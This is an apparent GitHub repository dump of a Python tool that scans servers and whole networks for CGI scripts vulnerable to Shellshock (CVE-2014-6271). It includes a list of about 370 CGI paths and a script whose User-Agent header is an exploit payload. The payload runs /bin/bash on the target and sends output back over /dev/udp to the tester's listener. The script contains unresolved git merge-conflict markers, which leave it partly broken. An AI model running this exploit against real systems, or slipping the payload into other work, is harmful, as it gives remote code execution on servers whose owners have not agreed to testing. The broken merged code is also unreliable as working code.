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If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | 341 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | shellshock-cgi 2 | ============== 3 | 4 | A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server 5 | 6 | ## Usage 7 | ``` 8 | $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 9 | ``` 10 | 11 | 12 | ##Example Return: 13 | ``` 14 | [+] Testing if 172.16.255.130 is vulnerable to CVE-2014-6271 via CGI 15 | 16 | [+] Listening for incoming connections on the following socket 172.16.255.1:4443 17 | 18 | [!] The server is vulnerable at the following URL: http://172.16.255.130/cgi-bin/status 19 | 20 | [!] The server is vulnerable at the following URI: http://172.16.255.130/cgi-bin/ax.cgi 21 | ``` 22 | 23 | 24 | ## Contributors 25 | Special thanks to https://github.com/Signus for general assitance with the threading and socket function 26 | 27 | ## Contact 28 | Twitter: [@francisckrs](https://twitter.com/francisckrs "twitterhandle on twitter") 29 | -------------------------------------------------------------------------------- /cgiscripts.txt: -------------------------------------------------------------------------------- 1 | / 2 | /_mt/mt.cgi 3 | /admin.cgi 4 | /administrator.cgi 5 | /agora.cgi 6 | /aktivate/cgi-bin/catgy.cgi 7 | /analyse.cgi 8 | /apps/web/vs_diag.cgi 9 | /axis-cgi/buffer/command.cgi 10 | /bandwidth/index.cgi 11 | /bigconf.cgi 12 | /cart.cgi 13 | /cartcart.cgi 14 | /ccbill/whereami.cgi 15 | /cgi-bin/status 16 | /cgi-bin-sdb/printenv 17 | /cgi-bin/.cobalt/alert/service.cgi 18 | /cgi-bin/.cobalt/message/message.cgi 19 | /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 20 | /cgi-bin/.namazu.cgi 21 | /cgi-bin/14all-1.1.cgi 22 | /cgi-bin/14all.cgi 23 | /cgi-bin/a1disp3.cgi 24 | /cgi-bin/a1stats/a1disp3.cgi 25 | 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/SetSecurity.shm 349 | /shop/member_html.cgi 350 | /shop/normal_html.cgi 351 | /site_searcher.cgi 352 | /siteUserMod.cgi 353 | /submit.cgi 354 | /technote/print.cgi 355 | /template.cgi 356 | /test.cgi 357 | /upload.cgi 358 | /userreg.cgi 359 | /users/scripts/submit.cgi 360 | /Web_Store/web_store.cgi 361 | /webtools/bonsai/ccvsblame.cgi 362 | /webtools/bonsai/cvsblame.cgi 363 | /webtools/bonsai/cvslog.cgi 364 | /webtools/bonsai/cvsquery.cgi 365 | /webtools/bonsai/cvsqueryform.cgi 366 | /webtools/bonsai/showcheckins.cgi 367 | /wwwadmin.cgi 368 | /wwwboard.cgi 369 | /cgi-sys/entropysearch.cgi 370 | /cgi-sys/FormMail-clone.cgi 371 | /wwwboard/wwwboard.cgi 372 | -------------------------------------------------------------------------------- /shellshock_cgi.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | '''This script will attempt to identify possible vulnerable CGI scripts on a server 5 | 6 | The test is performed by sending a maliciously crafted User-Agent that will instruct 7 | the vulnerable machine to echo the URL you are testing back to your system on a port of your choice. 8 | 9 | ***This requires that the machine you are testing be able to connect back to you; 10 | either via a local network, Public IP, or NAT*** 11 | 12 | Written by Francisco Donoso https://github.com/francisck 13 | ''' 14 | 15 | 16 | 17 | import socket, sys 18 | import argparse 19 | import urllib2 20 | from multiprocessing import Process 21 | from netaddr import IPNetwork 22 | from time import sleep 23 | 24 | def parse_args(): 25 | p = argparse.ArgumentParser(description='''Shellshock CGI vulnerably test''', 26 | formatter_class=argparse.RawTextHelpFormatter) 27 | 28 | p.add_argument('-s', '--server', help="The IP address or URL of the system you are trying to test no leading HTTP://") 29 | p.add_argument('-n', '--network', help="Enter a network to scan in CDIR notation") 30 | p.add_argument('-l', '--listen', required=True, help="The interface IP address that should listen on your system") 31 | p.add_argument('-p', '--port', default=4443, type=int, help="The port to listen on for the callback") 32 | 33 | args = p.parse_args() 34 | if not (args.server or args.network): 35 | p.error("You didn't enter a server or network to scan. add -s or -n and try agian") 36 | return args 37 | 38 | 39 | args = parse_args() 40 | host = args.listen 41 | port = args.port 42 | if args.network != None: 43 | network = args.network 44 | network = list(IPNetwork(network)) 45 | scan_cidr = True 46 | if args.server != None: 47 | server_clean = args.server 48 | server = server_clean.replace("http://","") 49 | server_ip = socket.gethostbyname(server) 50 | 51 | def test_socket(): 52 | try: 53 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 54 | # Set the socket to non-blocking in order to facilitate recvfrom interruption. 55 | s.setblocking(0) 56 | except socket.error: 57 | print 'Unable to create a socket.' 58 | sys.exit() 59 | 60 | try: 61 | s.bind((host,port)) 62 | except socket.error: 63 | print "Error binding to the socket." 64 | sys.exit() 65 | 66 | print '[+] Testing %s' %(ip) 67 | check_vuln() 68 | while True: 69 | try: 70 | data, respond_server = s.recvfrom(4096) 71 | if respond_server[0] == str(ip): #verify that the server responding is the same as the server we are testing 72 | print "[X] The server is vulnerable at the following URI: %s" %(data) 73 | except socket.error: 74 | # Socket is set to non-blocking. Errors at no-data. 75 | pass 76 | 77 | 78 | def check_vuln(): 79 | CGI_Scripts = open('cgiscripts.txt','r') #This is a list of possibly vulnerable CGI scripts. Will add more as I find them. 80 | #Most of these paths are from http://shellshock.detectify.com 81 | for uri in CGI_Scripts: 82 | #print "Scanning %s for CVE-2014-6271" % TEST 83 | server_test = "http://"+str(TEST)+str(uri) 84 | #print server_test 85 | #print "checked %s for vuln" % server_test 86 | usr_agent = "() { :;}; /bin/bash -c 'echo %s > /dev/udp/%s/%s'" %(server_test,host,port) #create a custom user-agent. 87 | #It echos the URI we are testing back via UDP to the host and port we specified (the machine you are running the code from) 88 | try: 89 | req = urllib2.Request(server_test, None, {"User-agent" : usr_agent}) 90 | urllib2.urlopen(req,None,1) 91 | except (urllib2.HTTPError, urllib2.URLError) as e: # a lot of the URLS we test are going to be 404s lets ignore those errors 92 | pass 93 | <<<<<<< HEAD 94 | CGI_Scripts.close() 95 | 96 | def test(number): 97 | global ip 98 | ip = number 99 | global TEST 100 | TEST = number 101 | t1 = Process(target = test_socket) 102 | try: # Need to spin up a thread to keep our socket open while we test URLs 103 | t1.daemon = True 104 | t1.start() 105 | sleep(1) 106 | except KeyboardInterrupt: #want to make sure this is interruptible 107 | t1.terminate() 108 | sys.exit() 109 | finally: 110 | t1.terminate() 111 | 112 | print '[+] Listening for incoming connections on the following socket' + " " + str(host) + ":" + str(port) 113 | for each in network: 114 | test(each) 115 | 116 | 117 | ======= 118 | 119 | def main(): 120 | try: # Need to spin up a thread to keep our socket open while we test URLs 121 | t1 = Thread(target = test_socket) 122 | t1.daemon = True 123 | t1.start() 124 | check_vuln() 125 | except KeyboardInterrupt: #want to make sure this is interruptible 126 | t1._Thread__stop() 127 | sys.exit() 128 | finally: 129 | t1._Thread__stop() 130 | sys.exit() 131 | 132 | if __name__ == "__main__": 133 | main() 134 | >>>>>>> FETCH_HEAD 135 | --------------------------------------------------------------------------------